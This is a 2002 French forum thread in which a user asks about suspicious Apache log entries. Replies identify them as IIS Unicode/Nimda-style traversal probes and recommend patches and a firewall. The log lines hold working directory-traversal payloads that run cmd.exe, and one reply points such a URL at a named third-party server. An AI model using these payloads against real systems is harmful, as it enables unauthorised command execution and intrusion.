Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2746 connectés 

  FORUM HardWare.fr
  Windows & Software

  Newby Apache et log bizarre [je flippe là...]

 
 


Dernière réponse
Sujet : Newby Apache et log bizarre [je flippe là...]
xinxang Merci à tous ceux qui m'ont aidé
 
Pour ceux qui ça intéresse (et pour clore ce topic) voici ce que j'ai trouvé :
 
http://httpd.apache.org/docs/misc/FAQ.html#codered
 
et
 
http://www.apacheweek.com/features/codered
 
qui proviennent du site officiel d'Apache.
 
:bounce:

Votre réponse
Nom d'utilisateur    Pour poster, vous devez être inscrit sur ce forum .... si ce n'est pas le cas, cliquez ici !
Le ton de votre message                        
                       
Votre réponse
[b][i][u][strike][spoiler][fixed][cpp][url][email][img][*]   
 
   [quote]
 
Options

 
Vous avez perdu votre mot de passe ?


Vue Rapide de la discussion
xinxang Merci à tous ceux qui m'ont aidé
 
Pour ceux qui ça intéresse (et pour clore ce topic) voici ce que j'ai trouvé :
 
http://httpd.apache.org/docs/misc/FAQ.html#codered
 
et
 
http://www.apacheweek.com/features/codered
 
qui proviennent du site officiel d'Apache.
 
:bounce:
120120 remeo, je parle en conaiss de cause, et pas ds le vent.
Si tu dis que appach, nais pas sensible a ce genre de faille, je ne le savais pas, je c juste que en general, les server avec iss, sont pas encore ts patcher.
 
Un exemple :
 
BBN Planet,
 
http://4.35.101.163/_vti_bin/..%25 [...] ?/c+dir+c:  
 
Pas là peine de t enerver comme ca,
C domage sur hardware.fr, les gens ce prennent là tete pour rien.
 
Et je fait pas le SCript-kiddies jai autre chose a faire.
120120 remeo, je parle en conaiss de cause, et pas ds le vent.
Si tu dis que appach, nais pas sensible a ce genre de faille, je ne le savais pas, je c juste que en general, les server avec iss, sont pas encore ts patcher.
 
Un exemple :
 
BBN Planet,
 
http://4.35.101.163/_vti_bin/..%25 [...] ?/c+dir+c:  
 
Pas là peine de t enerver comme ca,
C domage sur hardware.fr, les gens ce prenne là tete trop vitte
 
Et je fait pas le SCript-kiddies jai autre chose a faire.
120120 remeo, je parle en conaiss de cause, et pas ds le vent.
Si tu dis que appach, nais pas sensible a ce genre de faille, je ne le savais pas, je c juste que en general, les server avec iss, sont pas encore ts patcher.
 
Un exemple :
 
BBN Planet,
 
http://4.35.101.163/_vti_bin/..%25 [...] ystem32/cm
 
Pas là peine de t enerver comme ca,
C domage sur hardware.fr, les gens ce prenne là tete trop vitte
 
Et je fait pas le SCript-kiddies jai autre chose a faire.
120120 Je tais reply au @mail
xinxang ...donc je n'ai pas à m'inquiéter plus que ça...
mais c'est quand même flippant qu'un gars me balance son script comme ça et me fasse des dir.
Je sais pas ce qu'il reçoit mais dans mes logs je n'ai pas de message d'erreur (genre accès non autorisé ou autre). Parce que là ça a l'air d'etre un peu plus qu'un simple scan...
et ce qui me saoule c'est que c'est régulier (mais jusqu'ici pas de bobo).  
 
Autre chose, je viens d'aller chercher le patch pour la faille Unicode mais apparemment le SP2 est déjà patché
xinxang ok alors j'aimerais une précision :
 
j'ai installé Apache pour ne pas avoir un gruyère comme iis.
Mais est-ce que Apache se sert d'une façon ou d'une autre d'un ou plusieurs services iis ou bien est-il indépendant ?
 
Apparemment iis n'est pas installé...
xinxang merci de vos réponses
 
120 je viens de t'envoyer un mail avec tous les détails
(j'ai juste oublié de mettre un sujet dsl)
120120 oue mais bon, on a deja hacker pas mal de server avec cette failles.
120120 Bah oui, il ont axx a ts tes fichiers, ils peuvent aussi ts delet, sauf ds le rep sys32 (sous nt) ki est proteger en ecriture).
 
Si tu veux, je peux tester ton server, contact moi 120@fr.st
xinxang ok merci
 
je pensais qu'IIS était pas installé. C'est pour ça que j'ai attendu Apache en me disant que c'était plus sûr mais fo pas rever c'est W2K...en plus en Fat32...
 
Je vais de suite faire une cure de patchs
 
Est ce qu'avec ses dir le gars il peut avoir accées à mes autres dossiers que ceux mis dans DirectoryRoot ?
BratislaBoys

120120 a écrit a écrit :

On dirais que kkcn a essayer de te hacker, par une vielle faille ki s appelle l unicode (iss)
 
enfaite quand tu vois :
 
c/winnt/system32/cmd.exe?/c+dir  
 
c que le mec te fait un dir de ton DD, baser sous dos (cmd.exe)
 
install patch Secu MicroSoft, contre l iss.
 
Install un firewall, ca devrais deja en bloker plus d un.
 
Ca peux etre un mec ki ta scanner ton ip, a là recherche de failles.
 
Firewall t trankil
 
 
@+120  




j'ai le même pb, en fait c'est ces merdes de IIS qui attaquent un peu tous les sites webs

120120 On dirais que kkcn a essayer de te hacker, par une vielle faille ki s appelle l unicode (iss)
 
enfaite quand tu vois :
 
c/winnt/system32/cmd.exe?/c+dir  
 
c que le mec te fait un dir de ton DD, baser sous dos (cmd.exe)
 
install patch Secu MicroSoft, contre l iss.
 
Install un firewall, ca devrais deja en bloker plus d un.
 
Ca peux etre un mec ki ta scanner ton ip, a là recherche de failles.
 
Firewall t trankil
 
 
@+120
xinxang Je viens d'installer Apache 1.3 pour W2k (sp2 et fat32) et je reçois ce log au bout d'une heure :
 
80.14.240.79 - - [20/Apr/2002:00:53:40 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
80.14.240.79 - - [20/Apr/2002:00:53:40 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280
80.14.240.79 - - [20/Apr/2002:00:53:41 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
80.14.240.79 - - [20/Apr/2002:00:53:41 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
80.14.240.79 - - [20/Apr/2002:00:53:42 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
80.14.240.79 - - [20/Apr/2002:00:53:42 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
80.14.240.79 - - [20/Apr/2002:00:53:43 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
80.14.240.79 - - [20/Apr/2002:00:53:43 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337
80.14.240.79 - - [20/Apr/2002:00:53:43 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
80.14.240.79 - - [20/Apr/2002:00:53:44 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
80.14.240.79 - - [20/Apr/2002:00:53:44 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
80.14.240.79 - - [20/Apr/2002:00:53:44 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
80.14.240.79 - - [20/Apr/2002:00:53:45 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
 
 
Kes ke vous en pensez ?...
J'ai vu sur un autre topic un log qui ressemblait et qui semblait etre un vers mais c'était pas tt à fait ça.
 
J'ai coupé Apache car ça ne m'étonnerait pas que ce soit ça (au bout d'1h c'est abusé kan meme...) vu que j'ai une config assez fragile au niveau sécurité (j'ai rien touché au httpd.conf à part DirectoryRoot et Index).
 
Merci pour votre aide.

Forum MesDiscussions.Net, Version 2010.2
(c) 2000-2011 Doctissimo

Copyright © 1997-2025 Groupe LDLC (Signaler un contenu illicite / Données personnelles)